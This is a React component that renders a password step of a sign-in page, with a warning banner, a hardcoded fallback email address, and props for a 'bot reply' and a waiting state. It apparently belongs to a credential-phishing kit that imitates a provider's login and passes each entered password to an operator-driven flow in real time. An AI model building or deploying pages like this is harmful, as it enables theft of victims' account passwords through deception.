import React, { useState } from "react";
import s from "./stepStyles";

export default function Step2({ userId, onContinue, botReply, waiting }) {
  const [password, setPassword] = useState("");
  const [show, setShow] = useState(false);
  const [remember, setRemember] = useState(false);

  return (
    <div class="">
      {botReply == "empty" && (
        <div style={s.warningDiv}>
          <span style={s.warningIcon}>
            <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEsAAABLCAYAAAA4TnrqAAAACXBIWXMAAC4jAAAuIwF4pT92AAADGklEQVR4nO3c/VXDIBAA8KML6AgdwRGygW5g3aAjtBu4gXWDukFH0A0coU5wvlR4+igkfBzcQbz38kfbGMivJFJyAIjIvgHAGgAOAHAGAPyznfX7axH1FAC1s4B8227RWLrVhECZ7bBIrAQodrDWoFjBpEEdAWDQ+w36tRgwSVAbz99spICJhpIGJh5KElgTUFLAmoGSANYUFDdYc1CcYE1CcYE1C8UB1jRUbbDmoWqCdQFVC0zpQpJCKTVCPXr+9gkRD6HHVUqt9YipHZ+I+BlxnBHsxfPxKyJukk9YSouaGDGNHiEt1cJWKcCULapE6PKfPId+1PWPjmgs6VAmSoBFYbUCZYIaLBirNSgTlGBBWK1CmaACm8VqHcoEBdgkVi9QJnLBvFi9QZnIAXNi9QplIhXsCqt3KBNJYFJ+FAPA1lPuVsqPbxFQ+PsE2lX2UKHsIDCz81TaT63xKDasALCd3ucyLMI+HjVRj2qJbDNg66nLr+rAna7sVT0Y6uADOyidinhj3fffEPGB6j9PaCilrkYiEVEx1GPM3rm33v5aOaDGeK5ULzs+Zl7XCtf53zg7pYh4YqrkeeZ1lfCdv68HP3BUUkr4zn/E+nK8v2Wqt/2NcrVw1/lf7llHxwf3+inJ4kKft31zH+O40h1SV7wsDWzmMdrO9C3Ye/Do7sVX6b0HdEh/evB/dpbwCJ4FK+q3oRQwALizyryTAnWFJQRsMJskKCeWBLAaW8oj/in1bsFScyHmDtodWE7SyGzKUa0xeaXUeHO/dXx0RsR3ojLy0pECv40a2ccnz/FP3C0q6DKsCVYSiypfK7bQkhMBimBRJralFF4ErAQWdQZgaiVKzMkhxSqRKpnTvKlzSsmwSuWUSspWJuk6iMxWLnlJZtSlaB48VSX/Z1i0AtbU3B1OsCZnhXGANT3fsCZYFzNZa4B1NUe6JFiXs+9LgHW9rgMl2CJWDKEAW9RaNDlgi1zlKBDsf/2sSLCQbRkrsxGAsa35lzRHmiL0uNJr5KHyxqMygw0LfsH2gbvvOaEuwdWkrUtS/gq4iPANPmSEdRHI41sAAAAASUVORK5CYII=" width="25"></img>
          </span>
          <div class="">
            <p style={s.warningTextHead}>
              We don't recognize your information.</p>
            <p style={s.warningText}>
              Make sure you're signing in with your
              registered profile details. You can also sign in to a{" "}
              <span style={s.warningLink}>disconnected mobile account</span> or{" "}
              <span style={s.warningLink}>business account</span>.
            </p>
          </div>
        </div>
      )}
      <div style={s.card}>
        <h2 style={s.title}>Sign in</h2>

        <p style={s.youEntered}>You entered</p>
        <p style={s.enteredValue}>{userId || "krisloonan11@outlook...."}</p>
        <span style={s.editLink}>Edit</span>

        <div style={{ height: 16 }} />

        <label style={s.label}>Password</label>
        <div style={s.inputWrapper}>
          <input
            style={{ ...s.input, paddingRight: 60 }}
            type={show ? "text" : "password"}
            value={password}
            onChange={(e) => setPassword(e.target.value)}
            autoFocus
          />
          <button style={s.showBtn} onClick={() => setShow(!show)}>
            {show ? "Hide" : "Show"}
          </button>
        </div>

        <div style={s.rememberRow}>
          <label style={s.checkLabel}>
            <input
              type="checkbox"
              checked={remember}
              onChange={(e) => setRemember(e.target.checked)}
              style={{ marginRight: 6 }}
            />
            Remember user ID
          </label>
          <span style={s.link}>Forgot password</span>
        </div>

        {botReply && (
          <div style={s.botReply}>
            <p style={s.botReplyText}>{botReply}</p>
          </div>
        )}

        <button
          style={password.trim() ? s.btnActive : s.btnDisabled}
          disabled={!password.trim() || waiting}
          onClick={() => onContinue({ Password: password, "Remember User ID": remember ? "Yes" : "No" })}
        >
          {waiting ? "Please wait..." : "Sign in"}
        </button>
      </div>
    </div>
  );
}
